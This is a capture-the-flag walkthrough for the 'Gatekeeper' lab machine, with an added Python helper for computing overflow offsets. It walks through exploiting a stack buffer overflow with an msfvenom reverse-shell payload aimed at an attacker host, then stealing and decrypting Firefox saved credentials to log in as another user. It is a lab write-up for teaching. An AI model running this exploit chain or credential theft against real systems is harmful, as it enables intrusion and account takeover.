Gatekeeper

Tasks:

  1. Approach the Gates:
    1. Deploy the machine and complete the task.
  2. Defeat the Gatekeeper and pass through the fire:
    1. Start with the usual nmap scan - nmap -sC ip - ports 139 and 445 (SMB), 3389 (RDP), 31337 (Elite?) and many other RPC ports are open.
    2. Enumerate SMB shares with smbclient -L //ip -N. There is a share called Users that is accessible without a password. Connect to it with smbclient //ip/Users -N, then cd Share and get gatekeeper.exe. Copy the binary to a Windows VM for simpler testing.
    3. nc ip 31337 - there is an application that takes a username as input and replies 'hello username!!!'. This is the same application we got through SMB.
    4. Open gatekeeper.exe in Immunity Debugger.
    5. Run ncat 127.0.0.1 31337 - you should get connected to gatekeeper locally.
    6. Generate a 200-byte string with python -c "print('A'*200)" and feed it as the username in the ncat terminal; the application should crash, which confirms the buffer overflow.
    7. Generate a cyclic pattern of length 200 (online tool or Metasploit's pattern_create.rb), send it as the username this time, and note the EIP value when the application crashes - 39654138.
    8. Enter the EIP value in the same online tool, or use !mona findmsp -distance 200, to find the exact offset at which the buffer is overwritten - 146.
    9. In exploit.py replace the payload with the bad-character string and run exploit.py; notice that we now control EIP (42424242).
    10. Look for missing bad characters by following the ESP stack dump. If any byte is missing or out of order, remove it from the payload and repeat until all the bytes appear in the same order as sent. Bad chars - \x00\x0a
    11. Run !mona jmp -r esp -cpb "\x00\x0a" to find a jmp esp address - 080414C3 - and convert it to little endian, \xc3\x14\x04\x08; put that in the retn variable of exploit.py and assign "\x90" * 15 to the padding variable (NOPs).
    12. Generate the payload with msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\x00\x0a' -f py -v payload and replace the payload in exploit.py.
    13. Start a netcat listener - nc -nlvp 4444
    14. Run exploit.py to get a shell in the netcat listener.
    15. type user.txt.txt to get the user flag and submit it. Also notice that the Desktop contains a file called Firefox.lnk, which suggests Firefox is installed on the machine.
    16. cd C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release, then copy logins.json C:\Users\Share, copy cert9.db C:\Users\Share, copy key4.db C:\Users\Share, copy cookies.sqlite C:\Users\Share. Now you can download these with smbclient to your local machine.
    17. Clone this repo, copy the 4 files to a folder called loot, and run python firefox_decrypt.py "LootFolderLocation" - mayor:8CL7O1N78MdrCIsV creds obtained.
    18. Use psexec.py mayor:8CL7O1N78MdrCIsV@ip to log in as mayor; type whoami - mayor seems to be a system user.
    19. cd C:\Users\mayor\Desktop and type root.txt.txt to obtain the root flag and submit it!!!
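The three numbers the walkthrough reports in steps 7, 8, 10 and 11 (EIP 39654138, offset 146, the little-endian form of 080414C3) can be checked offline without the debugger or the online tool. The following is an added example, not code from the room or from the Metasploit project; it assumes the Metasploit pattern layout (three-character groups of uppercase letter, lowercase letter, digit) and uses a constructed stack dump for the bad-character comparison.

```python
import string
import struct

# Metasploit-style cyclic pattern (what pattern_create.rb emits): groups of
# Aa0, Aa1, ..., Aa9, Ab0, ... in which any four consecutive bytes are unique,
# so the value that lands in EIP identifies exactly where it came from.
def pattern_create(length: int) -> str:
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("requested length exceeds the 20280-byte pattern space")


def pattern_offset(eip_value: int, length: int = 200) -> int:
    """Offset at which the four bytes that ended up in EIP start.

    eip_value is the register as the debugger shows it (e.g. 0x39654138).
    x86 stores it little-endian, so 0x39654138 is the ASCII run "8Ae9" in
    memory order. Returns -1 if the value is not part of the pattern.
    """
    needle = struct.pack("<I", eip_value).decode("ascii", errors="replace")
    return pattern_create(length).find(needle)


def to_little_endian(address: int) -> bytes:
    """Pack a 32-bit address the way it must be laid out in the buffer."""
    return struct.pack("<I", address)


def first_bad_char(sent: bytes, seen: bytes):
    """Compare the bytes sent with what the debugger's stack dump shows.

    Returns the first sent byte that was dropped or altered, or None when
    the dump matches byte for byte (no bad characters remain in 'sent').
    """
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return b
    return None


if __name__ == "__main__":
    print(pattern_offset(0x39654138))      # 146, the offset found in step 8
    print(to_little_endian(0x080414C3))    # b'\xc3\x14\x04\x08', as in step 11
    # Constructed dump: the application truncated the input at the first NUL,
    # so everything after \x00 is missing from the stack.
    print(first_bad_char(bytes(range(256)), b""))   # 0, i.e. \x00 is bad
```

first_bad_char only reports the first divergence, which matches the iterative procedure in step 10: remove that byte from the string, resend, and compare again until the function returns None.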
